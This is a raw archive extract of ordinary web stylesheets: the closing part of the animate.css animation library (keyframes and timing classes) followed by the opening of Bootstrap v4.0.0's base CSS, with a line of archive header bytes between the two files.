  }
}

@keyframes hinge {
  0% {
    -webkit-transform-origin: top left;
    transform-origin: top left;
    -webkit-animation-timing-function: ease-in-out;
    animation-timing-function: ease-in-out;
  }

  20%,
  60% {
    -webkit-transform: rotate3d(0, 0, 1, 80deg);
    transform: rotate3d(0, 0, 1, 80deg);
    -webkit-transform-origin: top left;
    transform-origin: top left;
    -webkit-animation-timing-function: ease-in-out;
    animation-timing-function: ease-in-out;
  }

  40%,
  80% {
    -webkit-transform: rotate3d(0, 0, 1, 60deg);
    transform: rotate3d(0, 0, 1, 60deg);
    -webkit-transform-origin: top left;
    transform-origin: top left;
    -webkit-animation-timing-function: ease-in-out;
    animation-timing-function: ease-in-out;
    opacity: 1;
  }

  to {
    -webkit-transform: translate3d(0, 700px, 0);
    transform: translate3d(0, 700px, 0);
    opacity: 0;
  }
}

.hinge {
  -webkit-animation-duration: 2s;
  animation-duration: 2s;
  -webkit-animation-name: hinge;
  animation-name: hinge;
}

@-webkit-keyframes jackInTheBox {
  from {
    opacity: 0;
    -webkit-transform: scale(0.1) rotate(30deg);
    transform: scale(0.1) rotate(30deg);
    -webkit-transform-origin: center bottom;
    transform-origin: center bottom;
  }

  50% {
    -webkit-transform: rotate(-10deg);
    transform: rotate(-10deg);
  }

  70% {
    -webkit-transform: rotate(3deg);
    transform: rotate(3deg);
  }

  to {
    opacity: 1;
    -webkit-transform: scale(1);
    transform: scale(1);
  }
}

@keyframes jackInTheBox {
  from {
    opacity: 0;
    -webkit-transform: scale(0.1) rotate(30deg);
    transform: scale(0.1) rotate(30deg);
    -webkit-transform-origin: center bottom;
    transform-origin: center bottom;
  }

  50% {
    -webkit-transform: rotate(-10deg);
    transform: rotate(-10deg);
  }

  70% {
    -webkit-transform: rotate(3deg);
    transform: rotate(3deg);
  }

  to {
    opacity: 1;
    -webkit-transform: scale(1);
    transform: scale(1);
  }
}

.jackInTheBox {
  -webkit-animation-name: jackInTheBox;
  animation-name: jackInTheBox;
}

/* originally authored by Nick Pettit - https://github.com/nickpettit/glide */

@-webkit-keyframes rollIn {
  from {
    opacity: 0;
    -webkit-transform: translate3d(-100%, 0, 0) rotate3d(0, 0, 1, -120deg);
    transform: translate3d(-100%, 0, 0) rotate3d(0, 0, 1, -120deg);
  }

  to {
    opacity: 1;
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
  }
}

@keyframes rollIn {
  from {
    opacity: 0;
    -webkit-transform: translate3d(-100%, 0, 0) rotate3d(0, 0, 1, -120deg);
    transform: translate3d(-100%, 0, 0) rotate3d(0, 0, 1, -120deg);
  }

  to {
    opacity: 1;
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
  }
}

.rollIn {
  -webkit-animation-name: rollIn;
  animation-name: rollIn;
}

/* originally authored by Nick Pettit - https://github.com/nickpettit/glide */

@-webkit-keyframes rollOut {
  from {
    opacity: 1;
  }

  to {
    opacity: 0;
    -webkit-transform: translate3d(100%, 0, 0) rotate3d(0, 0, 1, 120deg);
    transform: translate3d(100%, 0, 0) rotate3d(0, 0, 1, 120deg);
  }
}

@keyframes rollOut {
  from {
    opacity: 1;
  }

  to {
    opacity: 0;
    -webkit-transform: translate3d(100%, 0, 0) rotate3d(0, 0, 1, 120deg);
    transform: translate3d(100%, 0, 0) rotate3d(0, 0, 1, 120deg);
  }
}

.rollOut {
  -webkit-animation-name: rollOut;
  animation-name: rollOut;
}

@-webkit-keyframes zoomIn {
  from {
    opacity: 0;
    -webkit-transform: scale3d(0.3, 0.3, 0.3);
    transform: scale3d(0.3, 0.3, 0.3);
  }

  50% {
    opacity: 1;
  }
}

@keyframes zoomIn {
  from {
    opacity: 0;
    -webkit-transform: scale3d(0.3, 0.3, 0.3);
    transform: scale3d(0.3, 0.3, 0.3);
  }

  50% {
    opacity: 1;
  }
}

.zoomIn {
  -webkit-animation-name: zoomIn;
  animation-name: zoomIn;
}

@-webkit-keyframes zoomInDown {
  from {
    opacity: 0;
    -webkit-transform: scale3d(0.1, 0.1, 0.1) translate3d(0, -1000px, 0);
    transform: scale3d(0.1, 0.1, 0.1) translate3d(0, -1000px, 0);
    -webkit-animation-timing-function: cubic-bezier(0.55, 0.055, 0.675, 0.19);
    animation-timing-function: cubic-bezier(0.55, 0.055, 0.675, 0.19);
  }

  60% {
    opacity: 1;
    -webkit-transform: scale3d(0.475, 0.475, 0.475) translate3d(0, 60px, 0);
    transform: scale3d(0.475, 0.475, 0.475) translate3d(0, 60px, 0);
    -webkit-animation-timing-function: cubic-bezier(0.175, 0.885, 0.32, 1);
    animation-timing-function: cubic-bezier(0.175, 0.885, 0.32, 1);
  }
}

@keyframes zoomInDown {
  from {
    opacity: 0;
    -webkit-transform: scale3d(0.1, 0.1, 0.1) translate3d(0, -1000px, 0);
    transform: scale3d(0.1, 0.1, 0.1) translate3d(0, -1000px, 0);
    -webkit-animation-timing-function: cubic-bezier(0.55, 0.055, 0.675, 0.19);
    animation-timing-function: cubic-bezier(0.55, 0.055, 0.675, 0.19);
  }

  60% {
    opacity: 1;
    -webkit-transform: scale3d(0.475, 0.475, 0.475) translate3d(0, 60px, 0);
    transform: scale3d(0.475, 0.475, 0.475) translate3d(0, 60px, 0);
    -webkit-animation-timing-function: cubic-bezier(0.175, 0.885, 0.32, 1);
    animation-timing-function: cubic-bezier(0.175, 0.885, 0.32, 1);
  }
}

.zoomInDown {
  -webkit-animation-name: zoomInDown;
  animation-name: zoomInDown;
}

@-webkit-keyframes zoomInLeft {
  from {
    opacity: 0;
    -webkit-transform: scale3d(0.1, 0.1, 0.1) translate3d(-1000px, 0, 0);
    transform: scale3d(0.1, 0.1, 0.1) translate3d(-1000px, 0, 0);
    -webkit-animation-timing-function: cubic-bezier(0.55, 0.055, 0.675, 0.19);
    animation-timing-function: cubic-bezier(0.55, 0.055, 0.675, 0.19);
  }

  60% {
    opacity: 1;
    -webkit-transform: scale3d(0.475, 0.475, 0.475) translate3d(10px, 0, 0);
    transform: scale3d(0.475, 0.475, 0.475) translate3d(10px, 0, 0);
    -webkit-animation-timing-function: cubic-bezier(0.175, 0.885, 0.32, 1);
    animation-timing-function: cubic-bezier(0.175, 0.885, 0.32, 1);
  }
}

@keyframes zoomInLeft {
  from {
    opacity: 0;
    -webkit-transform: scale3d(0.1, 0.1, 0.1) translate3d(-1000px, 0, 0);
    transform: scale3d(0.1, 0.1, 0.1) translate3d(-1000px, 0, 0);
    -webkit-animation-timing-function: cubic-bezier(0.55, 0.055, 0.675, 0.19);
    animation-timing-function: cubic-bezier(0.55, 0.055, 0.675, 0.19);
  }

  60% {
    opacity: 1;
    -webkit-transform: scale3d(0.475, 0.475, 0.475) translate3d(10px, 0, 0);
    transform: scale3d(0.475, 0.475, 0.475) translate3d(10px, 0, 0);
    -webkit-animation-timing-function: cubic-bezier(0.175, 0.885, 0.32, 1);
    animation-timing-function: cubic-bezier(0.175, 0.885, 0.32, 1);
  }
}

.zoomInLeft {
  -webkit-animation-name: zoomInLeft;
  animation-name: zoomInLeft;
}

@-webkit-keyframes zoomInRight {
  from {
    opacity: 0;
    -webkit-transform: scale3d(0.1, 0.1, 0.1) translate3d(1000px, 0, 0);
    transform: scale3d(0.1, 0.1, 0.1) translate3d(1000px, 0, 0);
    -webkit-animation-timing-function: cubic-bezier(0.55, 0.055, 0.675, 0.19);
    animation-timing-function: cubic-bezier(0.55, 0.055, 0.675, 0.19);
  }

  60% {
    opacity: 1;
    -webkit-transform: scale3d(0.475, 0.475, 0.475) translate3d(-10px, 0, 0);
    transform: scale3d(0.475, 0.475, 0.475) translate3d(-10px, 0, 0);
    -webkit-animation-timing-function: cubic-bezier(0.175, 0.885, 0.32, 1);
    animation-timing-function: cubic-bezier(0.175, 0.885, 0.32, 1);
  }
}

@keyframes zoomInRight {
  from {
    opacity: 0;
    -webkit-transform: scale3d(0.1, 0.1, 0.1) translate3d(1000px, 0, 0);
    transform: scale3d(0.1, 0.1, 0.1) translate3d(1000px, 0, 0);
    -webkit-animation-timing-function: cubic-bezier(0.55, 0.055, 0.675, 0.19);
    animation-timing-function: cubic-bezier(0.55, 0.055, 0.675, 0.19);
  }

  60% {
    opacity: 1;
    -webkit-transform: scale3d(0.475, 0.475, 0.475) translate3d(-10px, 0, 0);
    transform: scale3d(0.475, 0.475, 0.475) translate3d(-10px, 0, 0);
    -webkit-animation-timing-function: cubic-bezier(0.175, 0.885, 0.32, 1);
    animation-timing-function: cubic-bezier(0.175, 0.885, 0.32, 1);
  }
}

.zoomInRight {
  -webkit-animation-name: zoomInRight;
  animation-name: zoomInRight;
}

@-webkit-keyframes zoomInUp {
  from {
    opacity: 0;
    -webkit-transform: scale3d(0.1, 0.1, 0.1) translate3d(0, 1000px, 0);
    transform: scale3d(0.1, 0.1, 0.1) translate3d(0, 1000px, 0);
    -webkit-animation-timing-function: cubic-bezier(0.55, 0.055, 0.675, 0.19);
    animation-timing-function: cubic-bezier(0.55, 0.055, 0.675, 0.19);
  }

  60% {
    opacity: 1;
    -webkit-transform: scale3d(0.475, 0.475, 0.475) translate3d(0, -60px, 0);
    transform: scale3d(0.475, 0.475, 0.475) translate3d(0, -60px, 0);
    -webkit-animation-timing-function: cubic-bezier(0.175, 0.885, 0.32, 1);
    animation-timing-function: cubic-bezier(0.175, 0.885, 0.32, 1);
  }
}

@keyframes zoomInUp {
  from {
    opacity: 0;
    -webkit-transform: scale3d(0.1, 0.1, 0.1) translate3d(0, 1000px, 0);
    transform: scale3d(0.1, 0.1, 0.1) translate3d(0, 1000px, 0);
    -webkit-animation-timing-function: cubic-bezier(0.55, 0.055, 0.675, 0.19);
    animation-timing-function: cubic-bezier(0.55, 0.055, 0.675, 0.19);
  }

  60% {
    opacity: 1;
    -webkit-transform: scale3d(0.475, 0.475, 0.475) translate3d(0, -60px, 0);
    transform: scale3d(0.475, 0.475, 0.475) translate3d(0, -60px, 0);
    -webkit-animation-timing-function: cubic-bezier(0.175, 0.885, 0.32, 1);
    animation-timing-function: cubic-bezier(0.175, 0.885, 0.32, 1);
  }
}

.zoomInUp {
  -webkit-animation-name: zoomInUp;
  animation-name: zoomInUp;
}

@-webkit-keyframes zoomOut {
  from {
    opacity: 1;
  }

  50% {
    opacity: 0;
    -webkit-transform: scale3d(0.3, 0.3, 0.3);
    transform: scale3d(0.3, 0.3, 0.3);
  }

  to {
    opacity: 0;
  }
}

@keyframes zoomOut {
  from {
    opacity: 1;
  }

  50% {
    opacity: 0;
    -webkit-transform: scale3d(0.3, 0.3, 0.3);
    transform: scale3d(0.3, 0.3, 0.3);
  }

  to {
    opacity: 0;
  }
}

.zoomOut {
  -webkit-animation-name: zoomOut;
  animation-name: zoomOut;
}

@-webkit-keyframes zoomOutDown {
  40% {
    opacity: 1;
    -webkit-transform: scale3d(0.475, 0.475, 0.475) translate3d(0, -60px, 0);
    transform: scale3d(0.475, 0.475, 0.475) translate3d(0, -60px, 0);
    -webkit-animation-timing-function: cubic-bezier(0.55, 0.055, 0.675, 0.19);
    animation-timing-function: cubic-bezier(0.55, 0.055, 0.675, 0.19);
  }

  to {
    opacity: 0;
    -webkit-transform: scale3d(0.1, 0.1, 0.1) translate3d(0, 2000px, 0);
    transform: scale3d(0.1, 0.1, 0.1) translate3d(0, 2000px, 0);
    -webkit-transform-origin: center bottom;
    transform-origin: center bottom;
    -webkit-animation-timing-function: cubic-bezier(0.175, 0.885, 0.32, 1);
    animation-timing-function: cubic-bezier(0.175, 0.885, 0.32, 1);
  }
}

@keyframes zoomOutDown {
  40% {
    opacity: 1;
    -webkit-transform: scale3d(0.475, 0.475, 0.475) translate3d(0, -60px, 0);
    transform: scale3d(0.475, 0.475, 0.475) translate3d(0, -60px, 0);
    -webkit-animation-timing-function: cubic-bezier(0.55, 0.055, 0.675, 0.19);
    animation-timing-function: cubic-bezier(0.55, 0.055, 0.675, 0.19);
  }

  to {
    opacity: 0;
    -webkit-transform: scale3d(0.1, 0.1, 0.1) translate3d(0, 2000px, 0);
    transform: scale3d(0.1, 0.1, 0.1) translate3d(0, 2000px, 0);
    -webkit-transform-origin: center bottom;
    transform-origin: center bottom;
    -webkit-animation-timing-function: cubic-bezier(0.175, 0.885, 0.32, 1);
    animation-timing-function: cubic-bezier(0.175, 0.885, 0.32, 1);
  }
}

.zoomOutDown {
  -webkit-animation-name: zoomOutDown;
  animation-name: zoomOutDown;
}

@-webkit-keyframes zoomOutLeft {
  40% {
    opacity: 1;
    -webkit-transform: scale3d(0.475, 0.475, 0.475) translate3d(42px, 0, 0);
    transform: scale3d(0.475, 0.475, 0.475) translate3d(42px, 0, 0);
  }

  to {
    opacity: 0;
    -webkit-transform: scale(0.1) translate3d(-2000px, 0, 0);
    transform: scale(0.1) translate3d(-2000px, 0, 0);
    -webkit-transform-origin: left center;
    transform-origin: left center;
  }
}

@keyframes zoomOutLeft {
  40% {
    opacity: 1;
    -webkit-transform: scale3d(0.475, 0.475, 0.475) translate3d(42px, 0, 0);
    transform: scale3d(0.475, 0.475, 0.475) translate3d(42px, 0, 0);
  }

  to {
    opacity: 0;
    -webkit-transform: scale(0.1) translate3d(-2000px, 0, 0);
    transform: scale(0.1) translate3d(-2000px, 0, 0);
    -webkit-transform-origin: left center;
    transform-origin: left center;
  }
}

.zoomOutLeft {
  -webkit-animation-name: zoomOutLeft;
  animation-name: zoomOutLeft;
}

@-webkit-keyframes zoomOutRight {
  40% {
    opacity: 1;
    -webkit-transform: scale3d(0.475, 0.475, 0.475) translate3d(-42px, 0, 0);
    transform: scale3d(0.475, 0.475, 0.475) translate3d(-42px, 0, 0);
  }

  to {
    opacity: 0;
    -webkit-transform: scale(0.1) translate3d(2000px, 0, 0);
    transform: scale(0.1) translate3d(2000px, 0, 0);
    -webkit-transform-origin: right center;
    transform-origin: right center;
  }
}

@keyframes zoomOutRight {
  40% {
    opacity: 1;
    -webkit-transform: scale3d(0.475, 0.475, 0.475) translate3d(-42px, 0, 0);
    transform: scale3d(0.475, 0.475, 0.475) translate3d(-42px, 0, 0);
  }

  to {
    opacity: 0;
    -webkit-transform: scale(0.1) translate3d(2000px, 0, 0);
    transform: scale(0.1) translate3d(2000px, 0, 0);
    -webkit-transform-origin: right center;
    transform-origin: right center;
  }
}

.zoomOutRight {
  -webkit-animation-name: zoomOutRight;
  animation-name: zoomOutRight;
}

@-webkit-keyframes zoomOutUp {
  40% {
    opacity: 1;
    -webkit-transform: scale3d(0.475, 0.475, 0.475) translate3d(0, 60px, 0);
    transform: scale3d(0.475, 0.475, 0.475) translate3d(0, 60px, 0);
    -webkit-animation-timing-function: cubic-bezier(0.55, 0.055, 0.675, 0.19);
    animation-timing-function: cubic-bezier(0.55, 0.055, 0.675, 0.19);
  }

  to {
    opacity: 0;
    -webkit-transform: scale3d(0.1, 0.1, 0.1) translate3d(0, -2000px, 0);
    transform: scale3d(0.1, 0.1, 0.1) translate3d(0, -2000px, 0);
    -webkit-transform-origin: center bottom;
    transform-origin: center bottom;
    -webkit-animation-timing-function: cubic-bezier(0.175, 0.885, 0.32, 1);
    animation-timing-function: cubic-bezier(0.175, 0.885, 0.32, 1);
  }
}

@keyframes zoomOutUp {
  40% {
    opacity: 1;
    -webkit-transform: scale3d(0.475, 0.475, 0.475) translate3d(0, 60px, 0);
    transform: scale3d(0.475, 0.475, 0.475) translate3d(0, 60px, 0);
    -webkit-animation-timing-function: cubic-bezier(0.55, 0.055, 0.675, 0.19);
    animation-timing-function: cubic-bezier(0.55, 0.055, 0.675, 0.19);
  }

  to {
    opacity: 0;
    -webkit-transform: scale3d(0.1, 0.1, 0.1) translate3d(0, -2000px, 0);
    transform: scale3d(0.1, 0.1, 0.1) translate3d(0, -2000px, 0);
    -webkit-transform-origin: center bottom;
    transform-origin: center bottom;
    -webkit-animation-timing-function: cubic-bezier(0.175, 0.885, 0.32, 1);
    animation-timing-function: cubic-bezier(0.175, 0.885, 0.32, 1);
  }
}

.zoomOutUp {
  -webkit-animation-name: zoomOutUp;
  animation-name: zoomOutUp;
}

@-webkit-keyframes slideInDown {
  from {
    -webkit-transform: translate3d(0, -100%, 0);
    transform: translate3d(0, -100%, 0);
    visibility: visible;
  }

  to {
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
  }
}

@keyframes slideInDown {
  from {
    -webkit-transform: translate3d(0, -100%, 0);
    transform: translate3d(0, -100%, 0);
    visibility: visible;
  }

  to {
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
  }
}

.slideInDown {
  -webkit-animation-name: slideInDown;
  animation-name: slideInDown;
}

@-webkit-keyframes slideInLeft {
  from {
    -webkit-transform: translate3d(-100%, 0, 0);
    transform: translate3d(-100%, 0, 0);
    visibility: visible;
  }

  to {
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
  }
}

@keyframes slideInLeft {
  from {
    -webkit-transform: translate3d(-100%, 0, 0);
    transform: translate3d(-100%, 0, 0);
    visibility: visible;
  }

  to {
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
  }
}

.slideInLeft {
  -webkit-animation-name: slideInLeft;
  animation-name: slideInLeft;
}

@-webkit-keyframes slideInRight {
  from {
    -webkit-transform: translate3d(100%, 0, 0);
    transform: translate3d(100%, 0, 0);
    visibility: visible;
  }

  to {
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
  }
}

@keyframes slideInRight {
  from {
    -webkit-transform: translate3d(100%, 0, 0);
    transform: translate3d(100%, 0, 0);
    visibility: visible;
  }

  to {
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
  }
}

.slideInRight {
  -webkit-animation-name: slideInRight;
  animation-name: slideInRight;
}

@-webkit-keyframes slideInUp {
  from {
    -webkit-transform: translate3d(0, 100%, 0);
    transform: translate3d(0, 100%, 0);
    visibility: visible;
  }

  to {
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
  }
}

@keyframes slideInUp {
  from {
    -webkit-transform: translate3d(0, 100%, 0);
    transform: translate3d(0, 100%, 0);
    visibility: visible;
  }

  to {
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
  }
}

.slideInUp {
  -webkit-animation-name: slideInUp;
  animation-name: slideInUp;
}

@-webkit-keyframes slideOutDown {
  from {
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
  }

  to {
    visibility: hidden;
    -webkit-transform: translate3d(0, 100%, 0);
    transform: translate3d(0, 100%, 0);
  }
}

@keyframes slideOutDown {
  from {
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
  }

  to {
    visibility: hidden;
    -webkit-transform: translate3d(0, 100%, 0);
    transform: translate3d(0, 100%, 0);
  }
}

.slideOutDown {
  -webkit-animation-name: slideOutDown;
  animation-name: slideOutDown;
}

@-webkit-keyframes slideOutLeft {
  from {
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
  }

  to {
    visibility: hidden;
    -webkit-transform: translate3d(-100%, 0, 0);
    transform: translate3d(-100%, 0, 0);
  }
}

@keyframes slideOutLeft {
  from {
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
  }

  to {
    visibility: hidden;
    -webkit-transform: translate3d(-100%, 0, 0);
    transform: translate3d(-100%, 0, 0);
  }
}

.slideOutLeft {
  -webkit-animation-name: slideOutLeft;
  animation-name: slideOutLeft;
}

@-webkit-keyframes slideOutRight {
  from {
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
  }

  to {
    visibility: hidden;
    -webkit-transform: translate3d(100%, 0, 0);
    transform: translate3d(100%, 0, 0);
  }
}

@keyframes slideOutRight {
  from {
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
  }

  to {
    visibility: hidden;
    -webkit-transform: translate3d(100%, 0, 0);
    transform: translate3d(100%, 0, 0);
  }
}

.slideOutRight {
  -webkit-animation-name: slideOutRight;
  animation-name: slideOutRight;
}

@-webkit-keyframes slideOutUp {
  from {
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
  }

  to {
    visibility: hidden;
    -webkit-transform: translate3d(0, -100%, 0);
    transform: translate3d(0, -100%, 0);
  }
}

@keyframes slideOutUp {
  from {
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
  }

  to {
    visibility: hidden;
    -webkit-transform: translate3d(0, -100%, 0);
    transform: translate3d(0, -100%, 0);
  }
}

.slideOutUp {
  -webkit-animation-name: slideOutUp;
  animation-name: slideOutUp;
}

.animated {
  -webkit-animation-duration: 1s;
  animation-duration: 1s;
  -webkit-animation-fill-mode: both;
  animation-fill-mode: both;
}

.animated.infinite {
  -webkit-animation-iteration-count: infinite;
  animation-iteration-count: infinite;
}

.animated.delay-1s {
  -webkit-animation-delay: 1s;
  animation-delay: 1s;
}

.animated.delay-2s {
  -webkit-animation-delay: 2s;
  animation-delay: 2s;
}

.animated.delay-3s {
  -webkit-animation-delay: 3s;
  animation-delay: 3s;
}

.animated.delay-4s {
  -webkit-animation-delay: 4s;
  animation-delay: 4s;
}

.animated.delay-5s {
  -webkit-animation-delay: 5s;
  animation-delay: 5s;
}

.animated.fast {
  -webkit-animation-duration: 800ms;
  animation-duration: 800ms;
}

.animated.faster {
  -webkit-animation-duration: 500ms;
  animation-duration: 500ms;
}

.animated.slow {
  -webkit-animation-duration: 2s;
  animation-duration: 2s;
}

.animated.slower {
  -webkit-animation-duration: 3s;
  animation-duration: 3s;
}

@media (print), (prefers-reduced-motion) {
  .animated {
    -webkit-animation: unset !important;
    animation: unset !important;
    -webkit-transition: none !important;
    transition: none !important;
  }
}
PK!+hL��bootstrap/css/bootstrap.cssnu&1i�/*!
 * Bootstrap v4.0.0 (https://getbootstrap.com)
 * Copyright 2011-2018 The Bootstrap Authors
 * Copyright 2011-2018 Twitter, Inc.
 * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE)
 */
:root {
  --blue: #007bff;
  --indigo: #6610f2;
  --purple: #6f42c1;
  --pink: #e83e8c;
  --red: #dc3545;
  --orange: #fd7e14;
  --yellow: #ffc107;
  --green: #28a745;
  --teal: #20c997;
  --cyan: #17a2b8;
  --white: #fff;
  --gray: #6c757d;
  --gray-dark: #343a40;
  --primary: #007bff;
  --secondary: #6c757d;
  --success: #28a745;
  --info: #17a2b8;
  --warning: #ffc107;
  --danger: #dc3545;
  --light: #f8f9fa;
  --dark: #343a40;
  --breakpoint-xs: 0;
  --breakpoint-sm: 576px;
  --breakpoint-md: 768px;
  --breakpoint-lg: 992px;
  --breakpoint-xl: 1200px;
  --font-family-sans-serif: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol";
  --font-family-monospace: SFMono-Regular, Menlo, Monaco, Consolas, "Liberation Mono", "Courier New", monospace;
}

*,
*::before,
*::after {
  box-sizing: border-box;
}

html {
  font-family: sans-serif;
  line-height: 1.15;
  -webkit-text-size-adjust: 100%;
  -ms-text-size-adjust: 100%;
  -ms-overflow-style: scrollbar;
  -webkit-tap-highlight-color: transparent;
}

@-ms-viewport {
  width: device-width;
}

article, aside, dialog, figcaption, figure, footer, header, hgroup, main, nav, section {
  display: block;
}

body {
  margin: 0;
  font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol";
  font-size: 1rem;
  font-weight: 400;
  line-height: 1.5;
  color: #212529;
  text-align: left;
  background-color: #fff;
}

[tabindex="-1"]:focus {
  outline: 0 !important;
}

hr {
  box-sizing: content-box;
  height: 0;
  overflow: visible;
}

h1, h2, h3, h4, h5, h6 {
  margin-top: 0;
  margin-bottom: 0.5rem;
}

p {
  margin-top: 0;
  margin-bottom: 1rem;
}

abbr[title],
abbr[data-original-title] {
  text-decoration: underline;
  -webkit-text-decoration: underline dotted;
  text-decoration: underline dotted;
  cursor: help;
  border-bottom: 0;
}

address {
  margin-bottom: 1rem;
  font-style: normal;
  line-height: inherit;
}

ol,
ul,
dl {
  margin-top: 0;
  margin-bottom: 1rem;
}

ol ol,
ul ul,
ol ul,
ul ol {
  margin-bottom: 0;
}

dt {
  font-weight: 700;
}

dd {
  margin-bottom: .5rem;
  margin-left: 0;
}

blockquote {
  margin: 0 0 1rem;
}

dfn {
  font-style: italic;
}

b,
strong {
  font-weight: bolder;
}

small {
  font-size: 80%;
}

sub,
sup {
  position: relative;
  font-size: 75%;
  line-height: 0;
  vertical-align: baseline;
}

sub {
  bottom: -.25em;
}

sup {
  top: -.5em;
}

a {
  color: #007bff;
  text-decoration: none;
  background-color: transparent;
  -webkit-text-decoration-skip: objects;
}

a:hover {
  color: #0056b3;
  text-decoration: underline;
}

a:not([href]):not([tabindex]) {
  color: inherit;
  text-decoration: none;
}

a:not([href]):not([tabindex]):hover, a:not([href]):not([tabindex]):focus {
  color: inherit;
  text-decoration: none;
}

a:not([href]):not([tabindex]):focus {
  outline: 0;
}

pre,
code,
kbd,
samp {
  font-family: monospace, monospace;
  font-size: 1em;
}

pre {
  margin-top: 0;
  margin-bottom: 1rem;
  overflow: auto;
  -ms-overflow-style: scrollbar;
}

figure {
  margin: 0 0 1rem;
}

img {
  vertical-align: middle;
  border-style: none;
}

svg:not(:root) {
  overflow: hidden;
}

table {
  border-collapse: collapse;
}

caption {
  padding-top: 0.75rem;
  padding-bottom: 0.75rem;
  color: #6c757d;
  text-align: left;
  caption-side: bottom;
}

th {
  text-align: inherit;
}

label {
  display: inline-block;
  margin-bottom: .5rem;
}

button {
  border-radius: 0;
}

button:focus {
  outline: 1px dotted;
  outline: 5px auto -webkit-focus-ring-color;
}

input,
button,
select,
optgroup,
textarea {
  margin: 0;
  font-family: inherit;
  font-size: inherit;
  line-height: inherit;
}

button,
input {
  overflow: visible;
}

button,
select {
  text-transform: none;
}

button,
html [type="button"],
[type="reset"],
[type="submit"] {
  -webkit-appearance: button;
}

button::-moz-focus-inner,
[type="button"]::-moz-focus-inner,
[type="reset"]::-moz-focus-inner,
[type="submit"]::-moz-focus-inner {
  padding: 0;
  border-style: none;
}

input[type="radio"],
input[type="checkbox"] {
  box-sizing: border-box;
  padding: 0;
}

input[type="date"],
input[type="time"],
input[type="datetime-local"],
input[type="month"] {
  -webkit-appearance: listbox;
}

textarea {
  overflow: auto;
  resize: vertical;
}

fieldset {
  min-width: 0;
  padding: 0;
  margin: 0;
  border: 0;
}

legend {
  display: block;
  width: 100%;
  max-width: 100%;
  padding: 0;
  margin-bottom: .5rem;
  font-size: 1.5rem;
  line-height: inherit;
  color: inherit;
  white-space: normal;
}

progress {
  vertical-align: baseline;
}

[type="number"]::-webkit-inner-spin-button,
[type="number"]::-webkit-outer-spin-button {
  height: auto;
}

[type="search"] {
  outline-offset: -2px;
  -webkit-appearance: none;
}

[type="search"]::-webkit-search-cancel-button,
[type="search"]::-webkit-search-decoration {
  -webkit-appearance: none;
}

::-webkit-file-upload-button {
  font: inherit;
  -webkit-appearance: button;
}

output {
  display: inline-block;
}

summary {
  display: list-item;
  cursor: pointer;
}

template {
  display: none;
}

[hidden] {
  display: none !important;
}

h1, h2, h3, h4, h5, h6,
.h1, .h2, .h3, .h4, .h5, .h6 {
  margin-bottom: 0.5rem;
  font-family: inherit;
  font-weight: 500;
  line-height: 1.2;
  color: inherit;
}

h1, .h1 {
  font-size: 2.5rem;
}

h2, .h2 {
  font-size: 2rem;
}

h3, .h3 {
  font-size: 1.75rem;
}

h4, .h4 {
  font-size: 1.5rem;
}

h5, .h5 {
  font-size: 1.25rem;
}

h6, .h6 {
  font-size: 1rem;
}

.lead {
  font-size: 1.25rem;
  font-weight: 300;
}

.display-1 {
  font-size: 6rem;
  font-weight: 300;
  line-height: 1.2;
}

.display-2 {
  font-size: 5.5rem;
  font-weight: 300;
  line-height: 1.2;
}

.display-3 {
  font-size: 4.5rem;
  font-weight: 300;
  line-height: 1.2;
}

.display-4 {
  font-size: 3.5rem;
  font-weight: 300;
  line-height: 1.2;
}

hr {
  margin-top: 1rem;
  margin-bottom: 1rem;
  border: 0;
  border-top: 1px solid rgba(0, 0, 0, 0.1);
}

small,
.small {
  font-size: 80%;
  font-weight: 400;
}

mark,
.mark {
  padding: 0.2em;
  background-color: #fcf8e3;
}

.list-unstyled {
  padding-left: 0;
  list-style: none;
}

.list-inline {
  padding-left: 0;
  list-style: none;
}

.list-inline-item {
  display: inline-block;
}

.list-inline-item:not(:last-child) {
  margin-right: 0.5rem;
}

.initialism {
  font-size: 90%;
  text-transform: uppercase;
}

.blockquote {
  margin-bottom: 1rem;
  font-size: 1.25rem;
}

.blockquote-footer {
  display: block;
  font-size: 80%;
  color: #6c757d;
}

.blockquote-footer::before {
  content: "\2014 \00A0";
}

.img-fluid {
  max-width: 100%;
  height: auto;
}

.img-thumbnail {
  padding: 0.25rem;
  background-color: #fff;
  border: 1px solid #dee2e6;
  border-radius: 0.25rem;
  max-width: 100%;
  height: auto;
}

.figure {
  display: inline-block;
}

.figure-img {
  margin-bottom: 0.5rem;
  line-height: 1;
}

.figure-caption {
  font-size: 90%;
  color: #6c757d;
}

code,
kbd,
pre,
samp {
  font-family: SFMono-Regular, Menlo, Monaco, Consolas, "Liberation Mono", "Courier New", monospace;
}

code {
  font-size: 87.5%;
  color: #e83e8c;
  word-break: break-word;
}

a > code {
  color: inherit;
}

kbd {
  padding: 0.2rem 0.4rem;
  font-size: 87.5%;
  color: #fff;
  background-color: #212529;
  border-radius: 0.2rem;
}
